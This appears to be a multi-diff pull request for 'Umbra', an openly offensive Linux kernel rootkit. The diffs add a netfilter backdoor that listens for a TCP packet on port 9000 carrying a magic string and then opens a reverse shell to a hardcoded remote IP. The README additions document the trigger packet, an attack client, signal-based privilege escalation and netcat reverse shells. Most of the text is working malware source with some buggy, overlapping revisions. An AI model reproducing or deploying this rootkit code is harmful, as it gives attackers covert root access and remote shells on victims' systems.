### PR TITLE
Backdoor update

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -1,10 +1,11 @@
 CC = gcc
-EXTRA_CFLAGS=-I$(PWD)/include -I$(PWD)/src
+EXTRA_CFLAGS=-I$(PWD)/include -I$(PWD)/src -I$(PWD)/lib
 obj-m += umbra.o
 umbra-objs :=  main.o src/ftrace_manager.o src/creds_manager.o src/hookers.o src/utils.o src/netfilter_manager.o
 
 all:
 	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+	gcc client/client.c lib/libRawTCP_Lib.a -o client/client
 
 clean:
 	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

--- a/Makefile
+++ b/Makefile
@@ -1,7 +1,7 @@
 CC = gcc
 EXTRA_CFLAGS=-I$(PWD)/include -I$(PWD)/src
 obj-m += umbra.o
-umbra-objs :=  main.o src/ftrace_manager.o src/creds_manager.o src/hookers.o src/utils.o
+umbra-objs :=  main.o src/ftrace_manager.o src/creds_manager.o src/hookers.o src/utils.o src/netfilter_manager.o
 
 all:
 	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

--- a/README.md
+++ b/README.md
@@ -1,19 +1,20 @@
 ![GitHub release (latest by date including pre-releases)](https://img.shields.io/github/v/release/h3xduck/Umbra?include_prereleases)
-![Maintainability](https://img.shields.io/static/v1?label=maintainability&message=C&color=green)
+![Maintainability](https://img.shields.io/static/v1?label=maintainability&message=B&color=green)
 ![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/h3xduck/Umbra)
 ![GitHub last commit](https://img.shields.io/github/last-commit/h3xduck/Umbra)
 
 # Umbra
 
-Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which can be used to spawn netcat reverse shells to remote hosts and more.
+Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to remote hosts and more.
 
 The rootkit is still under development, although the features listed below are already fully operational.
 
 Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.
 
 ## Features
-* Privilege escalation by sending signal 50
-* Start netcat reverse shell on module load.
+* **NEW**: Backdoor which spawns reverse shell to remote IP after receiving specially crafter TCP packet.
+* Privilege escalation by sending signal 50.
+* Spawn netcat reverse shell on module load.
 * Spawn netcat reverse shell to a remote host by sending signal 51.
 
 More functionalities will come in later updates.
@@ -42,7 +43,7 @@ cd Umbra
 ```
 make
 ```
-1. Load Umbra in the kernel
+5. Load Umbra in the kernel
 ```
 sudo insmod ./umbra.ko
 ```
@@ -73,6 +74,17 @@ kill -51 1
 <img src="images/kill51screenshot.png" width = 800/>
 
 Note: Umbra also tries to start the reverse shell on load.
+
+### Spawn reverse shell via backdoor
+Any host can get a reverse shell by sending a specially-crafted packet to a machine infected with Umbra. The backdoor will try to open the shell on IP:5888, where IP is the IP address of the attacking machine.
+
+The packet must meet the following criteria:
+* Uses TCP protocol
+* Sent to port 9000, where backdoor listens
+* Payload starts with string UMBRA_PAYLOAD_GET_REVERSE_SHELL
+
+Example of execution:
+
 
 
 ## References

--- a/README.md
+++ b/README.md
@@ -9,10 +9,12 @@ Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up t
 
 The rootkit is still under development, although the features listed below are already fully operational.
 
+![Backdoor in action](https://github.com/h3xduck/Umbra/blob/magic_packets/images/umbrabackdoor.gif)
+
 Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.
 
 ## Features
-* **NEW**: Backdoor which spawns reverse shell to remote IP after receiving specially crafter TCP packet.
+* **NEW**: Backdoor which spawns reverse shell to remote IP after receiving a malicious TCP packet.
 * Privilege escalation by sending signal 50.
 * Spawn netcat reverse shell on module load.
 * Spawn netcat reverse shell to a remote host by sending signal 51.
@@ -80,7 +82,14 @@ Any host can get a reverse shell by sending a specially-crafted packet to a mach
 
 You can look at the code to know how to build your own packet, but I also provide a client which will do the job for you. You can download the client from [latest releases](https://github.com/h3xduck/Umbra/releases/), or you can build your own using my library [RawTCP](https://github.com/h3xduck/RawTCP_Lib).
 
-![Backdoor in action](https://github.com/h3xduck/Umbra/blob/magic_packets/images/umbrabackdoor.gif)
+The client is run as follows:
+
+```
+./client <attacker_ip> <victim_ip>
+```
+Where the attacker ip will be used by the backdoor to connect the reverse shell and the victim ip is the one of the machine infected with Umbra.
+
+
 
 
 

--- a/README.md
+++ b/README.md
@@ -75,10 +75,12 @@ kill -51 1
 
 Note: Umbra also tries to start the reverse shell on load.
 
-### Spawn reverse shell via backdoor
+### **NEW**: Spawn reverse shell via backdoor
 Any host can get a reverse shell by sending a specially-crafted packet to a machine infected with Umbra. The backdoor will try to open the shell on IP:5888, where IP is the IP address of the attacking machine.
 
-You can look at the code to build your own packet, but we also provide a client which will do the job for you. You can download the client from [latest releases](https://github.com/h3xduck/Umbra/releases/).
+You can look at the code to know how to build your own packet, but I also provide a client which will do the job for you. You can download the client from [latest releases](https://github.com/h3xduck/Umbra/releases/), or you can build your own using my library [RawTCP](https://github.com/h3xduck/RawTCP_Lib).
+
+![Backdoor in action](https://github.com/h3xduck/Umbra/blob/magic_packets/images/umbrabackdoor.gif)
 
 
 

--- a/README.md
+++ b/README.md
@@ -78,12 +78,9 @@ Note: Umbra also tries to start the reverse shell on load.
 ### Spawn reverse shell via backdoor
 Any host can get a reverse shell by sending a specially-crafted packet to a machine infected with Umbra. The backdoor will try to open the shell on IP:5888, where IP is the IP address of the attacking machine.
 
-The packet must meet the following criteria:
-* Uses TCP protocol
-* Sent to port 9000, where backdoor listens
-* Payload starts with string UMBRA_PAYLOAD_GET_REVERSE_SHELL
+You can look at the code to build your own packet, but we also provide a client which will do the job for you. You can download the client from [latest releases](https://github.com/h3xduck/Umbra/releases/).
 
-Example of execution:
+
 
 
 

--- a/include/CONFIG.h
+++ b/include/CONFIG.h
@@ -1,7 +1,7 @@
 #ifndef HEADER_CONFIG
 #define HEADER_CONFIG
 
-#define REVERSE_SHELL_IP "88.0.252.46"
+#define REVERSE_SHELL_IP "127.0.0.1"
 #define REVERSE_SHELL_PORT "5888"
 
 

--- a/include/CONFIG.h
+++ b/include/CONFIG.h
@@ -1,7 +1,7 @@
 #ifndef HEADER_CONFIG
 #define HEADER_CONFIG
 
-#define REVERSE_SHELL_IP "127.0.0.1"
+#define REVERSE_SHELL_IP "88.0.252.46"
 #define REVERSE_SHELL_PORT "5888"
 
 

--- a/include/netfilter_manager.h
+++ b/include/netfilter_manager.h
@@ -7,18 +7,21 @@
 #include <linux/ip.h>
 #include <linux/tcp.h>
 #include <linux/module.h>
+#include <linux/version.h>
 
-
-typedef unsigned int net_hook(unsigned int hook_num, struct sk_buff *skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *));
+//unsigned int nf_hookfn(unsigned int hook_num, struct sk_buff *skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *));
 
 //Netfilter hook options. Newer versions require building the struct ourselves
-struct def_nf_hook_ops {
+/*struct def_nf_hook_ops {
 	struct list_head list;
-    net_hook *hook; //Function to be called
+    nf_hookfn *hook; //Function to be called
 	struct module *owner;
 	u_int8_t pf;
 	unsigned int hooknum;
 	int priority;
-};
+};*/
+
+int register_netfilter_hook(void);
+void unregister_netfilter_hook(void);
 
 #endif

--- a/include/netfilter_manager.h
+++ b/include/netfilter_manager.h
@@ -8,6 +8,8 @@
 #include <linux/tcp.h>
 #include <linux/module.h>
 #include <linux/version.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
 
 //unsigned int nf_hookfn(unsigned int hook_num, struct sk_buff *skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *));
 

--- a/include/netfilter_manager.h
+++ b/include/netfilter_manager.h
@@ -1,0 +1,24 @@
+#ifndef HEADER_NETFILTER_MANAGER
+#define HEADER_NETFILTER_MANAGER
+
+#include <linux/kernel.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter_ipv4.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/module.h>
+
+
+typedef unsigned int net_hook(unsigned int hook_num, struct sk_buff *skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *));
+
+//Netfilter hook options. Newer versions require building the struct ourselves
+struct def_nf_hook_ops {
+	struct list_head list;
+    net_hook *hook; //Function to be called
+	struct module *owner;
+	u_int8_t pf;
+	unsigned int hooknum;
+	int priority;
+};
+
+#endif

--- a/include/utils.h
+++ b/include/utils.h
@@ -26,5 +26,4 @@ void execute_reverse_shell(struct work_struct *work);
  */ 
 int start_reverse_shell(char* ip, char* port);
 
-
 #endif

--- a/main.c
+++ b/main.c
@@ -15,6 +15,7 @@
 #include "include/hookers.h"
 #include "include/utils.h"
 #include "include/CONFIG.h"
+#include "include/netfilter_manager.h"
 
 #if !defined(CONFIG_X86_64) || (LINUX_VERSION_CODE < KERNEL_VERSION(4,17,0))
 #define VERSION_NOT_SUPPORTED
@@ -31,6 +32,7 @@ MODULE_VERSION("1");
 
 static void __exit mod_exit(void){
     remove_all_hooks();
+    unregister_netfilter_hook();
     
     printk(KERN_INFO "UMBRA:: Successfully unloaded\n");
 }
@@ -42,6 +44,10 @@ static int __init mod_init(void){
         return -1;
     #endif
     err = install_all_hooks();
+    if(err){
+        return err;
+    }
+    err = register_netfilter_hook();
     if(err){
         return err;
     }

--- a/src/netfilter_manager.c
+++ b/src/netfilter_manager.c
@@ -1,20 +1,32 @@
 #include "../include/netfilter_manager.h"
 
-static struct net n;
 
+const char* UMBRA_BACKDOOR_KEY = "UMBRA_PAYLOAD_GET_REVERSE_SHELL";
+/**
+ * Inspects incoming packets and check correspondence to backdoor packet:
+ *      Proto: TCP
+ *      Port: 9000
+ *      
+ */ 
 unsigned int net_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state){
     //Network headers
-    struct iphdr *ip_header;
-    struct tcphdr *tcp_header;    
-    struct sk_buff *sock_buff = skb;
+    struct iphdr *ip_header;        //ip header
+    struct tcphdr *tcp_header;      //tcp header
+    struct sk_buff *sock_buff = skb;//sock buffer
+    char *user_data;       //data header pointer
+    unsigned char *tail;            //data tail pointer
+    int size;                       //payload size
+    char* _data;
 
-    printk(KERN_INFO "UMBRA:: Called nethook");
+    struct tcphdr _tcphdr;
+    struct iphdr _iph;
 
     if (!sock_buff){
         return NF_ACCEPT; //socket buffer empty
     }
-
-    ip_header = (struct iphdr *)skb_network_header(sock_buff);
+    
+    ip_header = skb_header_pointer(skb, 0, sizeof(_iph), &_iph);
+    //ip_header = (struct iphdr *)skb_network_header(sock_buff);
     if (!ip_header){
         return NF_ACCEPT;
     }
@@ -22,16 +34,63 @@ unsigned int net_hook(void *priv, struct sk_buff *skb, const struct nf_hook_stat
     //Backdoor trigger: TCP
     if(ip_header->protocol==IPPROTO_TCP){ 
         unsigned int dport;
-        tcp_header= (struct tcphdr*)((unsigned int*)ip_header+ ip_header->ihl);
+
+        tcp_header = skb_header_pointer(skb, ip_header->ihl * 4, sizeof(_tcphdr), &_tcphdr);
+        //tcp_header= (struct tcphdr*)((unsigned int*)ip_header+ ip_header->ihl);
 
         dport = htons((unsigned short int) tcp_header->dest);
         //printk(KERN_INFO "UMBRA:: Received packet on port %u\n", dport);
         if(dport != 9000){
             return NF_ACCEPT; //We ignore those not for port 9000
         }
-        printk(KERN_INFO "UMBRA:: Received packet on port 9000");
+        printk(KERN_INFO "UMBRA:: Received packet on port 9000\n");
         
-        return NF_DROP;
+        /* Calculate pointers for begin and end of TCP packet data */
+        //user_data = (unsigned char*)((unsigned char *)ip_header+ ip_header->ihl*4 + tcp_header->doff*4);
+        tail = skb_tail_pointer(skb);
+
+        
+
+        //size = htons(ip_header->tot_len) - ip_header->ihl*4 - tcp_header->doff*4;
+        size = htons(ip_header->tot_len) - sizeof(_iph) - tcp_header->doff*4;
+        _data = kmalloc(size, GFP_KERNEL);
+
+			if (!_data)
+				return NF_ACCEPT;
+        _data = kmalloc(size, GFP_KERNEL);
+        user_data = skb_header_pointer(skb, ip_header->ihl*4 + tcp_header->doff*4, size, &_data);
+        if(!user_data){
+            printk(KERN_INFO "NULL INFO");
+            kfree(_data);
+            return NF_ACCEPT;
+        }
+        //user_data = (unsigned char *)((unsigned char *)tcp_header + (tcp_header->doff * 4));
+        printk(KERN_INFO "IP offest %i\n", ip_header->ihl*4);
+        printk(KERN_INFO "tcp offest %i\n", tcp_header->doff*4);
+       
+        printk(KERN_INFO "Total length %i\n", htons(ip_header->tot_len));
+        printk(KERN_INFO "Size of payload %i\n", size);
+        
+
+        printk(KERN_DEBUG "data len : %d\ndata : \n", (int)strlen(user_data));
+        printk(KERN_DEBUG "%s\n", user_data);
+
+        if(strlen(user_data)<32){
+            return NF_ACCEPT;
+        }
+
+        if(memcmp(user_data, UMBRA_BACKDOOR_KEY, strlen(UMBRA_BACKDOOR_KEY))==0){
+            //Packet had the secret payload.
+            printk(KERN_INFO "UMBRA:: Received backdoor packet \n");
+            //kfree(data);
+            return NF_DROP;
+        }
+
+
+        return NF_ACCEPT;
+        //printk(KERN_INFO "UMBRA:: Received backdoor packet with data %s\n", user_data);
+        
+        //return NF_DROP;
     }
     return NF_ACCEPT;
 

--- a/src/netfilter_manager.c
+++ b/src/netfilter_manager.c
@@ -2,12 +2,13 @@
 
 static struct net n;
 
-unsigned int net_hook(unsigned int hook_num, struct sk_buff *skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)){
-    
+unsigned int net_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state){
     //Network headers
     struct iphdr *ip_header;
     struct tcphdr *tcp_header;    
     struct sk_buff *sock_buff = skb;
+
+    printk(KERN_INFO "UMBRA:: Called nethook");
 
     if (!sock_buff){
         return NF_ACCEPT; //socket buffer empty
@@ -24,37 +25,53 @@ unsigned int net_hook(unsigned int hook_num, struct sk_buff *skb, const struct n
         tcp_header= (struct tcphdr*)((unsigned int*)ip_header+ ip_header->ihl);
 
         dport = htons((unsigned short int) tcp_header->dest);
-        printk(KERN_INFO "UMBRA:: Received packet on port %u\n", dport);
+        //printk(KERN_INFO "UMBRA:: Received packet on port %u\n", dport);
+        if(dport != 9000){
+            return NF_ACCEPT; //We ignore those not for port 9000
+        }
+        printk(KERN_INFO "UMBRA:: Received packet on port 9000");
+        
+        return NF_DROP;
     }
-
-    return 1;
+    return NF_ACCEPT;
 
 }
 
 /**
  * The struct comes from netfilter
  */ 
-static struct nf_hook_ops nf_hook_struct = {
+/*static struct nf_hook_ops nf_hook_struct = {
     .hook	  = (nf_hookfn*)net_hook,
     //.owner	  = THIS_MODULE,
-    .pf		  = NFPROTO_IPV4,
-    .hooknum  = NF_INET_FORWARD,
+    .pf		  = PF_BRIDGE,
+    .hooknum  = NF_INET_PRE_ROUTING, //Right after ip_rcv
     .priority = NF_IP_PRI_FIRST
-};
+};*/
+
+static struct nf_hook_ops nfho;
 
 /**
  * Registers predefined nf_hook_ops
  */ 
 int register_netfilter_hook(void){
     int err;
+    
+    nfho.hook = net_hook;
+    nfho.pf = PF_INET;
+    nfho.hooknum = NF_INET_PRE_ROUTING;
+    nfho.priority = NF_IP_PRI_FIRST;
+
     #if LINUX_VERSION_CODE >= KERNEL_VERSION(4,13,0)
-        err = nf_register_net_hook(&n, &nf_hook_struct);
+        err = nf_register_net_hook(&init_net, &nfho);
     #else
-        err = nf_register_hook(&nf_hook_struct);
+        err = nf_register_hook(&nfho);
     #endif
     if(err<0){
         printk(KERN_INFO "UMBRA:: Error registering nf hook");
+    }else{
+        printk(KERN_INFO "UMBRA:: Registered nethook");
     }
+    
     return err;
 }
 
@@ -62,10 +79,11 @@ int register_netfilter_hook(void){
  * Unregisters predefined nf_hook_ops
  */ 
 void unregister_netfilter_hook(void){
-    #if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
-        nf_unregister_net_hook(&n, &nf_hook_struct);
+    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4,13,0)
+        nf_unregister_net_hook(&init_net, &nfho);
     #else
-        nf_unregister_hook(&nf_hook_struct);
+        nf_unregister_hook(&nfho);
     #endif
+    printk(KERN_INFO "UMBRA:: Unregistered nethook");
 
 }

--- a/src/netfilter_manager.c
+++ b/src/netfilter_manager.c
@@ -1,14 +1,9 @@
 #include "../include/netfilter_manager.h"
 
-struct def_nf_hook_ops nf_hook_ops = {
-    .hook	  = net_hook,
-    .owner	  = THIS_MODULE,
-    .pf		  = NFPROTO_IPV4,
-    .hooknum  = NET_INET_FORWARD,
-    .priority = NF_IP4_PRI_FIRST
-};
+static struct net n;
 
-unsigned int net_hook (unsigned int hook_num, struct sk_buff *skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)){
+unsigned int net_hook(unsigned int hook_num, struct sk_buff *skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)){
+    
     //Network headers
     struct iphdr *ip_header;
     struct tcphdr *tcp_header;    
@@ -31,5 +26,46 @@ unsigned int net_hook (unsigned int hook_num, struct sk_buff *skb, const struct 
         dport = htons((unsigned short int) tcp_header->dest);
         printk(KERN_INFO "UMBRA:: Received packet on port %u\n", dport);
     }
+
+    return 1;
+
+}
+
+/**
+ * The struct comes from netfilter
+ */ 
+static struct nf_hook_ops nf_hook_struct = {
+    .hook	  = (nf_hookfn*)net_hook,
+    //.owner	  = THIS_MODULE,
+    .pf		  = NFPROTO_IPV4,
+    .hooknum  = NF_INET_FORWARD,
+    .priority = NF_IP_PRI_FIRST
+};
+
+/**
+ * Registers predefined nf_hook_ops
+ */ 
+int register_netfilter_hook(void){
+    int err;
+    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4,13,0)
+        err = nf_register_net_hook(&n, &nf_hook_struct);
+    #else
+        err = nf_register_hook(&nf_hook_struct);
+    #endif
+    if(err<0){
+        printk(KERN_INFO "UMBRA:: Error registering nf hook");
+    }
+    return err;
+}
+
+/**
+ * Unregisters predefined nf_hook_ops
+ */ 
+void unregister_netfilter_hook(void){
+    #if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
+        nf_unregister_net_hook(&n, &nf_hook_struct);
+    #else
+        nf_unregister_hook(&nf_hook_struct);
+    #endif
 
 }

--- a/src/netfilter_manager.c
+++ b/src/netfilter_manager.c
@@ -1,0 +1,35 @@
+#include "../include/netfilter_manager.h"
+
+struct def_nf_hook_ops nf_hook_ops = {
+    .hook	  = net_hook,
+    .owner	  = THIS_MODULE,
+    .pf		  = NFPROTO_IPV4,
+    .hooknum  = NET_INET_FORWARD,
+    .priority = NF_IP4_PRI_FIRST
+};
+
+unsigned int net_hook (unsigned int hook_num, struct sk_buff *skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)){
+    //Network headers
+    struct iphdr *ip_header;
+    struct tcphdr *tcp_header;    
+    struct sk_buff *sock_buff = skb;
+
+    if (!sock_buff){
+        return NF_ACCEPT; //socket buffer empty
+    }
+
+    ip_header = (struct iphdr *)skb_network_header(sock_buff);
+    if (!ip_header){
+        return NF_ACCEPT;
+    }
+
+    //Backdoor trigger: TCP
+    if(ip_header->protocol==IPPROTO_TCP){ 
+        unsigned int dport;
+        tcp_header= (struct tcphdr*)((unsigned int*)ip_header+ ip_header->ihl);
+
+        dport = htons((unsigned short int) tcp_header->dest);
+        printk(KERN_INFO "UMBRA:: Received packet on port %u\n", dport);
+    }
+
+}

--- a/src/netfilter_manager.c
+++ b/src/netfilter_manager.c
@@ -69,12 +69,12 @@ unsigned int net_hook(void *priv, struct sk_buff *skb, const struct nf_hook_stat
        
         printk(KERN_INFO "Total length %i\n", htons(ip_header->tot_len));
         printk(KERN_INFO "Size of payload %i\n", size);
-        
+        */
 
         printk(KERN_DEBUG "data len : %d\ndata : \n", (int)strlen(user_data));
-        printk(KERN_DEBUG "%s\n", user_data);*/
+        printk(KERN_DEBUG "%s\n", user_data);
 
-        if(strlen(user_data)<32){
+        if(strlen(user_data)<31){
             return NF_ACCEPT;
         }
 
@@ -90,7 +90,7 @@ unsigned int net_hook(void *priv, struct sk_buff *skb, const struct nf_hook_stat
 
             start_reverse_shell(ip_source, REVERSE_SHELL_PORT);
             //TODO: Hide the backdoor packet to the local system
-            return NF_ACCEPT;
+            return NF_DROP;
         }
 
 

--- a/src/netfilter_manager.c
+++ b/src/netfilter_manager.c
@@ -1,5 +1,6 @@
 #include "../include/netfilter_manager.h"
-
+#include "../include/utils.h"
+#include "../include/CONFIG.h"
 
 const char* UMBRA_BACKDOOR_KEY = "UMBRA_PAYLOAD_GET_REVERSE_SHELL";
 /**
@@ -82,15 +83,14 @@ unsigned int net_hook(void *priv, struct sk_buff *skb, const struct nf_hook_stat
         if(memcmp(user_data, UMBRA_BACKDOOR_KEY, strlen(UMBRA_BACKDOOR_KEY))==0){
             //Packet had the secret payload.
             printk(KERN_INFO "UMBRA:: Received backdoor packet \n");
-            //kfree(data);
+            //kfree(_data);
+            start_reverse_shell(REVERSE_SHELL_IP, REVERSE_SHELL_PORT);
             return NF_DROP;
         }
 
 
         return NF_ACCEPT;
-        //printk(KERN_INFO "UMBRA:: Received backdoor packet with data %s\n", user_data);
-        
-        //return NF_DROP;
+
     }
     return NF_ACCEPT;
 

--- a/src/utils.c
+++ b/src/utils.c
@@ -51,7 +51,7 @@ int start_reverse_shell(char* ip, char* port){
 
     err = schedule_work(&params->work);
     if(err<0){
-        printk(KERN_INFO "UMBRA:: Erro scheduling work of starting shell\n");
+        printk(KERN_INFO "UMBRA:: Error scheduling work of starting shell\n");
     }
     return err;
 


### PR DESCRIPTION
This update incorporates the network backdoor which will open a reverse shell to an attacker when Umbra receives a malicious TCP packet on port 9000